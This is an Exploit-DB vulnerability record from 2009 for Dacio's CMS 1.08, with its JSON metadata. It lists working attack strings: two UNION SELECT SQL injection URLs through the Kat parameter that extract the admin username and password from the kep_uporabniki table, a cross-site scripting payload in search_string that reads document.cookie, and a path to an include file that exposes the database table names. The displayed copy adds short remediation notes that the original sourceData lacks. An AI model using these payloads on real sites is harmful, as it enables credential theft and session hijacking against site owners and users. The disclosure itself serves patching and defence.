ID EDB-ID:8042
Type exploitdb
Reporter Mehmet Ince
Modified 2009-02-11T00:00:00
Description
dacio's CMS 1.08 (xss/sql/dd) Multiple Vulnerabilities. Web application exploit for the PHP platform.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= XORON 2009(C)
=
= Dacio's PHP scripts CMS v1.08 Remote SQL Injection Vuln.
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script: Dacio's PHP scripts CMS, version 1.08
= Price: $Free
=
= Author: xoron
=
= Tesekkurler unutmayan VolqaN!
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= BUGS
=
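= SQL injections (the Kat parameter reaches the database query unfiltered; validate it as an integer and use parameterised queries):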
= /?Kat=-1/**/union/**/select/**/username/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*
= /?Kat=-1/**/union/**/select/**/userpass/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*
=
=
= XSS vulnerability (search_string is written back into the page without HTML encoding; encode it on output):
= /index.php?search_string="><script>alert(document.cookie)</script>
=
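= MySQL table names disclosed (presumably the "dd" item in the title; the include file appears to be readable over HTTP, so direct access to .inc files should be blocked):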
= /include/funkcije.inc
=
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# milw0rm.com [2009-02-11]
{"id": "EDB-ID:8042", "hash": "9f2582f1ca74e292556bc976aaafa108", "type": "exploitdb", "bulletinFamily": "exploit", "title": "dacio's CMS 1.08 xss/sql/dd Multiple Vulnerabilities", "description": "dacio's CMS 1.08 (xss/sql/dd) Multiple Vulnerabilities. Webapps exploit for php platform", "published": "2009-02-11T00:00:00", "modified": "2009-02-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/8042/", "reporter": "Mehmet Ince", "references": [], "cvelist": [], "lastseen": "2016-02-01T04:37:30", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-02-01T04:37:30"}, "dependencies": {"references": [], "modified": "2016-02-01T04:37:30"}, "vulnersScore": 0.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/8042/", "sourceData": "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n=\n= XORON 2009(C)\n=\n= Dacio's PHP scripts CMS v1.08 Remote SQL Injection Vuln. 
\n= \n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n=\n= Script: Dacio's PHP scripts CMS, version 1.08\n= Price: $Free\n=\n= Author: xoron\n=\n= Tesekkurler unutmayan VolqaN!\n=\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n=\n= BUGS \n=\n= Sql Injections:\n= /?Kat=-1/**/union/**/select/**/username/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*\n= /?Kat=-1/**/union/**/select/**/userpass/**/from/**/kep_uporabniki/**/where/**/IdUser=1/*\n= \n=\n= XSS Vuln:\n= /index.php?search_string=\"><script>alert(document.cookie)</script>\n=\n= MySQL Tables:\n= /include/funkcije.inc\n= \n=\n=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n# milw0rm.com [2009-02-11]\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{}